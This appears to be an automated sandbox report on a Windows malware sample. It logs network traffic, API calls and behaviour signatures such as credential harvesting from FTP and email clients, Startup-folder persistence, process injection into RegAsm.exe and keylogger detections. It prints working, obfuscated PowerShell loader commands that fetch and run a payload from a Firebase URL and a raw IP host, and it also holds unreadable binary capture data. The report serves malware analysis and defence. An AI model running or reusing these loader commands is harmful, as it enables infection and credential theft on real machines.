Data received	lÄî3çÌaÊ%Rú´f/OÁ¶"lo8hK&ÝÈï Î5Æ^âòqqcßà6¥ªÌoÕ+2.UíÚÆûQåvjë»b=´ L%¼ì\|@ Ó~ýè%ÜúÚI sG±h4ÉD&TUj¸IÓ£þ´w©GºQÙ^?ºUy+ªÀ¤Ä #uí\|vj&-Ó%=%¢GnIëwÎ¯%I¹²æ£å¸G\]ø>ä2+¹ã Å° #ß767~¨CéZ&5½ÛÉ?51¦È;:õMÔ+HlbctaI:ÜOK ÀñËçå80ÄÒÉ³å'JÔ/UÅ-=V(î´ÈÝÕT»på±m(:.qBxÅåÍWlswz÷¦ómÙw3Û1»3iø8dÌ{Ç¶g¥Îí°ÎÕK>µë¶L×þµÝûiKx½SUÐ<Ï7±Ã;Ø§ ýñÍÊ£¦æcØ².¦àº+`¿Ì1ÃÄ´ uÇïù+Î¹oõXêåÙLµNæÖp ÈpïÛ»¥¶Ã×và¬ÏoïBÐþÞYYÐÔáÚ´¦_>/Z,cc?=Ñ:qéÐÜ´ï²Á)qÏ),îùvu0ð¶øA¼ZNU8áß ß6"è]YÏ¯ôZ,î÷Á¿Çvú3$´KyLØ?îªé¯ðhÀÛþGØz±§yÌgånQÀpÂÐ¦õ\|øª?üxXêÿÖ 9¬D¶#c}mVït¥ü'\|øU\ç?¿´áºá¾\úÄ¼!á;0¨ýÀ¹pD]=ò}Ð¨ÜÙK¯û_¹ªRÍ9Ûp^¿ñkTI,^õÛèVEêÇÚ6°\|gp(ÑyOäeéñ¬§ý¯ÄÅìab>YkçW,}h Ýl}Ò-B¯(,}ÌãPn ³sO5ª».tyò^KÔÖÈ ý8\«L@ìþÅùã½ô£qà³nÕmÙm¹K{ÉÍT* 7{ß)¹Æ\|ªeÜÇz× êqÚID=5« pgãF§S2 ãUOF½¶×R¹AxôìT¤@l#çáHyvøâÃ§R\ßÈðï¹ Ú£4ºÿéhà06ûîÞ7kód'9JÐÀ¨»üÓbtfçIRìÉü»ZT0ªìû \ã¡]àá'l¢Z¨¯I¹ã>6ðÙ HOo ëI`5Ä¡ØMÖð"Ë<A¿sâë2B£k÷æå4øæû©A w¹ª²ãGûmÔØô^qYuÛ÷%¥ÃüT2é$ÉUFÊÌÅwtÚMG¡<Ãþ&=:ïæâ!uÕAn D¼3E¹ªã¢Çd¼@ÂÒG QÒ5âN \oeãEÂu5!ÒA~=,{NëUË¼¤Îø=±hðª^çõÑg%¥6ã±¿+dã2ÿCÍ¯pV¾U)ïw±3¹>s@=uß¸ðÒÄ5u$Ã?÷%Ë%ß #¨MÀ; £(Ôi¨n,%£ð ½1 ²Mgå¨(amXAÖ¶Òh#º5u8ôXjÞÈ¯ûoõµBçyë¾õ<Ø$ò ]2º¬2ìØ
Data received	0
Data received	óµ{'¥-'{Ì};¯JÙ§<h&ÝH·«¨KéEÚhWB¤Çxs;zÏPÕmè½¼w{clbp%\w¿ã13_ÂÜõíV 6ñºý¾©>p{°QÌ[:Â«Û'$QÌÔæâÞó5ìW>p4Ê(+k¹_~XGöjG%B{,Nr7, ÖUN_xgÂU@QÅÁ:ýk«"Å!ÜkàÝxjI·LD¿âHÿ'-o#¢à à3ÿgë2pMÍmµSóÀúRAe°åØö¦È°¿¸çp]Ü>v"©©!xMDK7÷Âw Âîè{¨ðá²ÔN2ÂýªÇ^ SîÕ~Z-5ííÕµIëÙÐ÷ØÕóqõ6LF´ì8²«uMUóBÆ TÁ//ÍÍ Û.ôËñÄÜ¬ RÜ±N¦p^àGà§0Ø+5ø(ÃªéU\|º0fÇFô^yñÞ!ÂºÀiU5³fJ¹yf@Sæaîó¼Ì³ÔM¢ÑSéI5K±¢Þ%fFÇÑvÇ¬ êøÍöõ±¦l0`6£?ÙÛ5ª7¤á×:EØaÅhðÁC°Ôùò1NíácdµÚµ/¹Dþs¶öâmA>ý»?-t_Ô©¨©Gû9nh8k¼ñ±Á_Î±ó(Î=!Aýua:aò¬á0R©¿s>òLï<f6"'6Lï¤Ã±gÌXûöXµÌ·C$PÄ^4¾ÒÙVÍ:MåÈ;aìUpÛ½flTìÎþñR~¼!ãÌk[xþXÚô8ê¶Èk²³P²Wcæ:^-°\|£Ü ÿu!¿ëC÷±Õý.L;hg.Sw¡wA¡çOG·ïØ5HØ²"¹<°åz¨£¹;¦Ü´þ&J«Á
Data received	Y`¶íºÄS¦åF})#Íl8Åö7cø²Ó´pªÈâ·NSJ ²£ñxâý®ËÇ6LZm0E\yMoPËnûA öÍÆ)ç#µTÞ¸Ý ²-&Ö,ð:#ØU~ûWü¡ ú¥é?¿U+°Úë³ãF(íÕ81p>9@¹î¾]ÔðßÛÿuJL°(Î«\|y>ëh §!»üEpýð+ßUaCiî³ËAp½p¹A=øÁ½V½M "Ë1EÝç6Ó¢²%GÛx>\¥;àCÜþ¹>òéîë&BtXêô_Ùõ.lÅ¶ÏÁA_/Â!2°óyoföò®È¢/¶AfQ)¾rÿ-íC§¡zãMéG5ý·åÝ@« :Ìm\|GóÔìeüÛPSºµqÿA}zTîdSä \|Ü{5ÑßjKm6CC«¯ùH »¶9Ý@«Õãè·ÒªÎ;u%G~!<0"S'<AOi:ä°Ö®î÷;J¨'×-àuQaíg>ÿñ,ì±Mü³¿ç÷;ãçéön¸F #vwgvx*Ú{¯nÄÈáÍì¶SMäQ½n´¶Bú¦hê~Ö)H4$è`¾f¡«u÷óâe13ý?+(ÒåÌ¹ÊÂÈ3úFíh"
Data received	1æRQÃOwméÜF mùüLÜX¯åÿ%?Y8Q<è´hèù\|(¼æ±ÖlÆR¸¢J-ï9pý¾á,eã>~òCXtÅ!Vo´1Ïç<¯ß&jàk!Ît\éé@mðì¤'8·+¦÷z#ðráPÚ;ÊÉß}#Æ»" :ûÎ.dª÷¾Z¯CÚBä!§=þxö5¶cEI!G^v.Åäº¶Tolóé\>kç¸÷£´áÁQp3Bú½8MWUþùÃñrem!!h_µ\|Ñ\æ¿Ï9õ1=b#¬ú^dO°JÄÞÒn¸>¦ÉÍÝAá}QÕ þ ¬Uë©ÂÍÀõHT©d#rªúB4ýe-@%Í [#6ÄqE¨tÿVàGk+m]¿íýúìuÅËöªê3 5É6SÐò8$Ä¿Z ÚOF§?úÝÅ¸ù#(åÎÝÊ ^Y`Öeü:MîG±G/+¢Ë#ßÑÌx×#zÅæ¡«sµugl¬«k¸¥ÊÔ~(õL<aijÖÀÙ3ÉÊÑB»¥§+¡H/´ýZµ³e hER(ò3®cä\|yeÎq\Hª¹!ñ¢àÎC§¿)Ý¤àgÜ+íµ30ã:[ÿë²Í%^~Û¢?Ê®ß§ÝðÇf@®õÚZ«Ü´ÛÂ.¶´o+ï¤ÌDYÑëæ ìÂÝ¸<]éAbúÄ×~r7ùv7Á· >¬ûkÓíõÃ7ï;ãe{ÜS0½q¸èÃ«÷æ·{GSòæs(¾uJ9Øs¤ß¡Ã9$ªo¤Nã2¢ÐæÛÐ4H«É©&]Ù l«óà0i.·øù§_ÖÍ.âw±Ø}¶³Ì»ÎÃâ&6Ýº¿ÃÓ°ÏêÇúCÀ¦uÓ~Wá ¿^ :{Ì»ÑÕNÏÏUsöXÌ°3G:¼^Òí#9ëÊÖc Ä[ç)!3nïãAX¡?ú³²î6oõÅþüqÜÓGø®×]ðT`°QrZg¢Jå#Âñj°×iµùý}Þ!úð \9Ö(MùÅâ¡ßFÞsª²,¸°_<L<Çt»]àGòÅºþïAv"¡\Htµ@ÀES©´õÍsQûuÃnC°þaº'EÇ¦³ ¦uÉ'ÑK_úÒ}Ç§RÀ©Ë¨ÞNNÌë¼^`hvÏ.îvÑ(eíä~OÙ<Þµ<È*µ®¾õwi¦W X~@T'Þz¼ó6Ö¤4²J«l>L ¸Víûïü3¤^©¢ãmËItØ}ÝÖÍ<- 9QÊÓµ·ö£¶?²uÖ¸>ªwQ¡Ø js[S¢Dlø1Ñùn×Ù¬ë+&I2Þn~^}ô 8 ÆØTåÝXB£wzÇË\yX¤]¨ª +ìÕaólð,¯(½ÎB¯ÖE(_ÁÂÉ°zÔÖM¶O6vtÍ&>NC-nØq¨\K±Þ3~ W=\Fõ ÆüÍ½ÙÞJEz¥{ûæAÓÇ[BFÃüÍgÔ?¯!âvk`Ø!xlÛY¨×a3~¾k+ÕÀÏ÷õìJúî=9&ðãBóÍ¥4~É
Data received	3Óbø Å)n6èrÐc»%ÇC0Æ27ckY#7Û«!¥ÑþS(m¦'Käsë²3tw ²ÒqBåçÓmt+å½<¶uNRºPÀ?©çoÏ6EÄÐøÑ[ÜÝTîc9Çdµ? §Ì,Aw³KÊ^u>MNPE¿eÙÝl um³§mÉwfs.2B£eMµ(±xcÌCOì¶-°ÊPÅwö§#E(Ã§+Ä^3ªÈÍÛ#lïU®]m¢¦ À÷¦O<ç=w:´ %l]¡âº%ò~1Dö{;iµ§ÖÝÎb3=¢Ød)ïøQÁÒÅ ©)ðxºþ(yâ4+¡ç%õE¯}åµ°u¯]»¶íÆÆ¤ÛÛú Ò}7ÿ2&äGWKo£5Ïeº=äÛ,ö¡_~ nÄvóô~\|¿'Ø j\aéò1ÁQ+v;+HÃTM:S<bíÂ>t¡?lÇêm;¸^`êLÝzãNµØF øàME^A`ö¶§«ÂÐðF.+s®Q°þzÔkláÊ'Òó§zò{k?×^nÒ¦=õNÿGa+ml<Íp!öða $ Z!Ü^Ný£lQf¶B>¶0w¼HfcøsTNîá Aùp¬>I{ó]·ºCtÛeæ¦91sT¬Z§»ozª¡/Kz]6¾ÓbFV.´lBÚê/ë.ßô,B@&ð =L[#òG8t£swggaÑHà=%hAs¿"9 +_psH3?óyY¯m 7}mñäýKNSþØ¼ !Qiã]ì®¤D"Íàî~È µyÔ¶0;ÈQðxÃÓ$Û\|´V4=W°D5çeNª¿¿óÑ{øa= .b°eÄ?wpM+7ºÆYòÿå1\|U>úh¼>^ÈÍ.áSwcÓÄfEÅE÷ôñ½û',»9Äú*Øêî
Data received	DºµÐÅ÷¯Êr?é@B;Ë¦ñÌ{7´òþpR7V~$6{5K[G< ø9.§çëbµ[;zrôu¹ çJÏso^Â`üyF-rÛèì±n1¦ð³Ð\ÿnéÊ]`0l]ÌìôÐöT¾P»L¨6Ýµ9r¸Aknöë<ÃW6ýzªDÓ¾ÓÖOèÖÂM¼EX©ØYY ×ÁÑH>rµíÇÿä¯E®°ÙY±zP¨2N:Ï¨öö{·E÷®Ìâ Å3×ñ_ÈU\|>®xÂï6°`ù8"ÇÚkB¹l}BÕuØäLhBJÅ,Æþõ3]êYîåj[ì¨z I,j8 4UÐ!ð#_,{ZÉøÃùtø,§r¬Ü#îKûL½» ©L rºç\ âI^+gfþ±Ñ$/ÏÇHËÌå$lPª 3êAY;´Í* yVþªbÇª³(f÷WÎµøAíVäÛs¼Ñ9à7ºX1\|X¬2e×§§í%I1XõèÕ Ñ)ôëp`Wø¨QþtÝ£}UDåù#<"<ÛÜIi{õç¥Ø` PM6sõ¤Ú!

Poweshell is sending data to a remote host (4 events)

Data sent	}e¤JsÒ0A«í2ÐÙ.çsS×Âö5ÇG÷í/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com
Data sent	FBAîÆÒ#]¡ö\|¹è#Fsn-Ùg^=UÀ3ã!c\|±ÙLTÒè¼ÕÎ µ3²4/ºæ/¥tMþ0+f÷À·L^_8NÈºál2§Ëþ^RØ'·4dýØ¥<%*Eª Øû dà
Data sent	ÐéNrNÝ0Ï]. ÂæËã22x±ÙÒ)Ëw-ñ¬óÖ©.ÕùÑcÅà!³Õ!¤K\«¨ÇåZ#Ï¯Õýõ"ÞéÛÙÃZ¿ÃÜñÝõV:GÞwÀ»Î¤±YüUU]<$Ã!0}O*÷Æx6:µì_ê0Ó=×Ì¦ãÏ>àúI%¢îÀ'ÂÖ pyÚõI&hGäÑÏ\ÁÁR´ uvÚ÷Ñ ÉI7ñ7HUÂô´¦/î
Data sent	GET /88/Runtime.txt HTTP/1.1 Host: 198.46.178.152 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 21, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 21, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 21, 2023, 6:10 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 21, 2023, 6:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (12 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications smtp	rule	Network_SMTP_dotNet
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Run a KeyLogger	rule	KeyLogger

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	ping 127.0.0.1 -n 5
cmdline	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
cmdline	cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"

Communicates with host for which no DNS query was performed (1 event)

host

198.46.178.152

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 21, 2023, 6:11 p.m.	process_identifier: 2868 region_size: 270336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000358	1	0	0

Harvests credentials from local FTP client softwares (5 events)

file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file	C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry	HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELFeà0®Í à@ @ÈÌSàF H.text$ ® `.rsrcFà°@@.reloc¶@B base_address: 0x00400000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: P8h à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee5027e73-68a7-491a-b852-8635a83d4256.exe(LegalCopyright \|)OriginalFilenamee5027e73-68a7-491a-b852-8635a83d4256.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043e000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: À = base_address: 0x00440000 process_identifier: 2868 process_handle: 0x00000358	1	1
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2868 process_handle: 0x00000358	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 21, 2023, 6:11 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELFeà0®Í à@ @ÈÌSàF H.text$ ® `.rsrcFà°@@.reloc¶@B base_address: 0x00400000 process_identifier: 2868 process_handle: 0x00000358	1	1	0

Harvests credentials from local email clients (6 events)

file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send Sept. 21, 2023, 6:11 p.m.	buffer: }e¤JsÒ0A«í2ÐÙ.çsS×Âö5ÇG÷í/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com socket: 1448 sent: 134	1	134
send Sept. 21, 2023, 6:11 p.m.	buffer: FBAîÆÒ#]¡ö\|¹è#Fsn-Ùg^=UÀ3ã!c\|±ÙLTÒè¼ÕÎ µ3²4/ºæ/¥tMþ0+f÷À·L^_8NÈºál2§Ëþ^RØ'·4dýØ¥<%*Eª Øû dà socket: 1448 sent: 134	1	134
send Sept. 21, 2023, 6:11 p.m.	buffer: ÐéNrNÝ0Ï]. ÂæËã22x±ÙÒ)Ëw-ñ¬óÖ©.ÕùÑcÅà!³Õ!¤K\«¨ÇåZ#Ï¯Õýõ"ÞéÛÙÃZ¿ÃÜñÝõV:GÞwÀ»Î¤±YüUU]<$Ã!0}O*÷Æx6:µì_ê0Ó=×Ì¦ãÏ>àúI%¢îÀ'ÂÖ pyÚõI&hGäÑÏ\ÁÁR´ uvÚ÷Ñ ÉI7ñ7HUÂô´¦/î socket: 1448 sent: 213	1	213
send Sept. 21, 2023, 6:11 p.m.	buffer: GET /88/Runtime.txt HTTP/1.1 Host: 198.46.178.152 Connection: Keep-Alive socket: 900 sent: 78	1	78

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2516 called NtSetContextThread to modify thread in remote process 2868
NtSetContextThread Sept. 21, 2023, 6:11 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4443422 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000039c process_identifier: 2868	1	0	0

One or more non-whitelisted processes were created (6 events)

parent_process	wscript.exe	martian_process	powershell -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
parent_process	wscript.exe	martian_process	cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
parent_process	powershell.exe	martian_process	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2516 resumed a thread in remote process 2868
NtResumeThread Sept. 21, 2023, 6:11 p.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2868	1	0	0

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

Executed a process and injected code into it, probably while unpacking (37 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2076 thread_handle: 0x000002f8 process_identifier: 2072 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000300	1	1
CreateProcessInternalW Sept. 21, 2023, 6:10 p.m.	thread_identifier: 2428 thread_handle: 0x000002a4 process_identifier: 2424 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwA4ADgALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAK